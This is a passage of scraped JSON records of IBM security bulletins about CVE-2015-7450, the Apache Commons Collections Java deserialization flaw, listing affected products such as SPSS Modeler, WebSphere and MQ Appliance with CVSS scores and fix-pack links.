Affected Products and Versions\n\nIBM Content Navigator 2.0.1, 2.0.2 and 2.0.3 \n \nIBM Content Navigator is a component that is available to customers in these products (and the products that contain them): \n\n\n * IBM Content Manager \n * IBM FileNet Content Manager\n * IBM Content Foundation\n * IBM Content Manager OnDemand\n\n## Remediation/Fixes\n\n \nVersion 2.0.1: Upgrade to 2.0.2+ and apply appropriate patch from below \n \nVersion 2.0.2: Apply fix pack [2.0.2.8-ICN-LA001](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%2BContent%2BManagement&product=ibm/Other+software/Content+Navigator&release=2.0.2.8&platform=All&function=fixId&fixids=2.0.2.8-ICN-LA001-*&includeSupersedes=0>), or higher \n \nVersion 2.0.3: Apply fix pack [2.0.3.4-ICN-LA009](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%2BContent%2BManagement&product=ibm/Other+software/Content+Navigator&release=2.0.3.4&platform=All&function=fixId&fixids=2.0.3.4-ICN-LA009-*&includeSupersedes=0>), [2.0.3.5-ICN-LA003](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%2BContent%2BManagement&product=ibm/Other+software/Content+Navigator&release=2.0.3.4&platform=All&function=fixId&fixids=2.0.3.4-ICN-LA009-*&includeSupersedes=0>), or higher \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:13:42", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Content Navigator (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T12:13:42", "id": "709E27E3685930B945F2FBC357A30EA55914B7F6AA51DED371226AB763C07085", "href": "https://www.ibm.com/support/pages/node/273701", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:03", "description": "## Summary\n\nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SPSS Modeler 14.2 FP3 IF026 and earlier \n\nIBM SPSS Modeler 15 FP3 IF014 and earlier\n\nIBM SPSS Modeler 16 FP2 IF010 and earlier\n\nIBM SPSS Modeler 17 FP1 IF012 and earlier\n\nIBM SPSS Modeler 17.1 IF002 and ealier\n\n## Remediation/Fixes\n\nProduct\n\n| VRMF| APAR| Remediation/First Fix \n---|---|---|--- \nIBM SPSS Modeler| 14.2.0.3| PI52868| [SPSS Modeler 14.2 Fix Pack 3 Interim Fix 027](<http://www-01.ibm.com/support/docview.wss?uid=swg24041325>) \nIBM SPSS Modeler| 15.0.0.3| PI52868| [SPSS Modeler 15.0 Fix Pack 3 Interim Fix 015](<http://www-01.ibm.com/support/docview.wss?uid=swg24041324>) \nIBM SPSS Modeler| 16.0.0.2| PI52868| [SPSS Modeler 16.0 Fix Pack 2 Interim Fix 011](<http://www-01.ibm.com/support/docview.wss?uid=swg24041323>) \nIBM SPSS Modeler| 17.0.0.1| PI52868| [SPSS Modeler 17.0 Fix Pack 1 Interim Fix 013](<http://www-01.ibm.com/support/docview.wss?uid=swg24041298>) \nIBM SPSS Modeler| 17.1.0.0| PI52868| [SPSS Modeler 17.1 Interim Fix 003](<http://www-01.ibm.com/support/docview.wss?uid=swg24041322>) \n \n## Workarounds and Mitigations\n\nNone \n \n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www-03.ibm.com/systems/z/advantages/security/integrity_sub.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:37:31", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM SPSS Modeler (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T13:37:31", "id": "F665A1245FF1694ED9B578D35C955B51DAA051F90350DA793AFAC0D05F2DCC0B", "href": "https://www.ibm.com/support/pages/node/274449", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:39:25", "description": "## Summary\n\nThe Knowledge Center Component used in Version 9 of the WebSphere Application Server needs an updated Apache Commons Collections library. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n** DESCRIPTION: **Serialized-object interfaces in certain IBM analytics, business solutions, cognitive, IT infrastructure, and mobile and social products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the InvokerTransformer class in the Apache Commons Collections library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWebSphere Application Server| 9.0 \n \n## Remediation/Fixes\n\n**For IBM WebSphere Application Server:** ** \n** \n**For V9.0.0.0 through 9.0.5.1:**\n\n * Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PH16353](<https://www.ibm.com/support/pages/node/1106769> \"PH16353\" )\n\n\\-- OR\n\n * Apply Fix Pack 9.0.5.2 or later (targeted availability 4Q2019).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-20T08:47:33", "type": "ibm", "title": "Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-20T08:47:33", "id": "46EE401E382E2FF6D9E4A9CC93A2B8F4B5670C253D12335D89A76805C2BB9CAD", "href": "https://www.ibm.com/support/pages/node/1107105", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:49", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Jazz Team Server and Cognos Business Intelligence (Cognos BI) shipped with Rational Insight.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nRational Insight 1.1, 1.1.1, 1.1.1.1 and 1.1.1.2| Cognos BI 10.1.1 \nRational Insight 1.1.1.3| Cognos BI 10.2.1 \nRational Insight 1.1.1.4, 1.1.1.5 and 1.1.1.6| Cognos BI 10.2.1 Fix pack 2 \nJazz Team Server 5.0, 5.0.1 and 5.0.2 \nRational Insight 1.1.1.7| Cognos BI 10.2.1 Fix pack 2 \nJazz Team Server 6.0 \n \n## Remediation/Fixes\n\nApply the recommended fixes to all affected versions of Rational Insight. \n \n \n**Rational Insight 1.1 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 15 (Implemented by file 10.1.6305.512)](<http://www-01.ibm.com/support/docview.wss?uid=swg24041201>). \nReview technote [1679272: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Insight 1.1](<http://www-01.ibm.com/support/docview.wss?uid=swg21679272>) for detailed instructions.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1, 1.1.1.1 and 1.1.1.2 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 15 (Implemented by file 10.1.6305.512)](<http://www-01.ibm.com/support/docview.wss?uid=swg24041201>). \nRead technote [1679281: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Reporting for Development Intelligence 2.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679281>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.3 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.2.1 Interim Fix 13 (Implemented by file 10.2.5000.508)](<http://www-01.ibm.com/support/docview.wss?uid=swg24041199>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.4 and 1.1.1.5 and 1.1.1.6 and 1.1.1.7 ** \n \n\n\n 1. If the Data Collection Component (DCC) is used, perform this step first. \nReview the topics in [Security Bulletin: A security vulnerability has been identified in IBM WebSphere\u00ae Application Server shipped with multiple IBM Rational products based on IBM's Jazz technology (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971615>) for addressing the listed vulnerability in the underlying Jazz Team Server. \n\n 2. If the Cognos-based reporting server is used, also perform this step. \nDownload the [IBM Cognos Business Intelligence 10.2.1.1 Interim Fix 12 (Implemented by file 10.2.5009.501)](<http://www-01.ibm.com/support/docview.wss?uid=swg24041199>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:45", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational Insight (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:45", "id": "C55D668E9DAA959DD19BE97127802F50A829DCC234E975F8050767FE8AEFE217", "href": "https://www.ibm.com/support/pages/node/272227", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:38", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by WebSphere eXtreme Scale.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nWebSphere eXtreme Scale 7.1.0 \n\nWebSphere eXtreme Scale 7.1.1\n\nWebSphere eXtreme Scale 8.5\n\nWebSphere eXtreme Scale 8.6\n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_WebSphere eXtreme Scale_| 7.1.0| _PI52470_| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=7.1.0.3&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=7.1.0.3&platform=All&function=all>) \n_WebSphere eXtreme Scale_| 7.1.1| _PI52487_| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=7.1.1.1&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=7.1.1.1&platform=All&function=all>) \n_WebSphere eXtreme Scale_| 8.5.0| _PI52487_| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=8.5.0.3&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=8.5.0.3&platform=All&function=all>) \n_WebSphere eXtreme Scale_| 8.6| _PI52487_| [_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=8.6.0.8&platform=All&function=all_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+eXtreme+Scale&release=8.6.0.8&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNo workaround exists. If you are running WebSphere eXtreme Scale clients or servers, apply the appropriate fix from the previous table. If you are running WebSphere eXtreme Scale clients or servers that are embedded in WebSphere Application Server, apply also the appropriate fix for WebSphere Application Server, which is described here: **_<https://www-304.ibm.com/support/docview.wss?uid=swg21962931>_**\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:12", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects WebSphere eXtreme Scale (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:12", "id": "7E1AD56C932EE6022D560B647F3D701B90E917C8D245F2619F30EAFAE93014A2", "href": "https://www.ibm.com/support/pages/node/272235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:35", "description": "## Summary\n\nVulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository Studio (CVE-2015-7450) \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\n \nWebSphere Service Registry and Repository Studio V8.5 \nWebSphere Service Registry and Repository Studio V8.0 \nWebSphere Service Registry and Repository Studio V7.5 \nWebSphere Service Registry and Repository Studio V7.0 \n \nFor unsupported versions IBM recommends upgrading to a fixed, supported version of the product \n\n## Remediation/Fixes\n\nFor **WebSphere Service Registry and Repository Studio** the vulnerability has been fixed under APAR IV79089. \n \nThere is only one supported version of WSRR Studio and this is currently V8.5.6.0. Users of previous releases of Studio are entitled to update to V8.5.6.0 which is fully backwards compatibile with all previous releases. \n \nFor all WSRR Studio releases: \n\n\n * Apply [**V8.5.6.0_IV79089**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=8.5.6.0-WS-WSRR-Studio-MultiOS-IFIV79089>)** \n**\n * Please note that the server component of WSRR is also vulnerable to this issue. Please see the separate bulletin on how to resolve this issue for the server. \n \n**Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository (CVE-2015-7450) **\n\n * IBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.** \n**\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:15", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository Studio (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:15", "id": "37F20862021E2273CA661487C97F330F1BD3D1DBF7AEDDE1618F02B8075D2210", "href": "https://www.ibm.com/support/pages/node/272677", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:34", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM MQ Appliance.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM MQ Appliance M2000\n\n## Remediation/Fixes\n\nApply fix pack [8.0.0.4](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM%20MQ%20Appliance%20M2000&release=All&platform=All&function=all>) or later maintenance\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:15", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM MQ Appliance (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:15", "id": "BC0101448BC6D245EC449A34D85006E8788416F6400860557751151F3E3B29C3", "href": "https://www.ibm.com/support/pages/node/272565", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:35", "description": "## Summary\n\nVulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository (CVE-2015-7450) \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\n \nWebSphere Service Registry and Repository V8.5 \nWebSphere Service Registry and Repository V8.0 \nWebSphere Service Registry and Repository V7.5 \nWebSphere Service Registry and Repository V7.0 \n \nFor unsupported versions IBM recommends upgrading to a fixed, supported version of the product \n\n## Remediation/Fixes\n\nTo remediate this vulnerability you need to apply fixes for both IBM WebSphere Application Server and IBM WebSphere Service Registry and Repository. \n \nFor** WebSphere Application Server** updates refer to this bulletin: \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) \n \nFor **WebSphere Service Registry and Repository** the vulnerability has been fixed under APAR **IV79085**. \n \nIFixes containing IV79085 have been published and are available from Fix Central. \n \n**For WSRR V8.5**\n\n * Apply [**V8.5.6.0_IV79085**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=8.5.6.0-WS-WSRR-MultiOS-IFIV79085>)** \n**\n**For WSRR V8.0**\n\n * Apply [**V8.0.0.3_IV65487_IV79085**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=8.0.0.3-WS-WSRR-MultiOS-IFIV65487_IV79085>)\n * **For WSRR V7.5**\n\n * Apply [**V7.5.0.4_IV60346_IV79085**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=7.5.0.4-WS-WSRR-MultiOS-IFIV60346_IV79085>)\n * **For WSRR V7.0**\n\n * Apply** **[**V7.0.0.5_IV60346_IV79085**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=7.0.0.5-WS-WSRR-MultiOS-IFIV60346_IV79085>)\n * * IBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.** \n**\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:15", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": 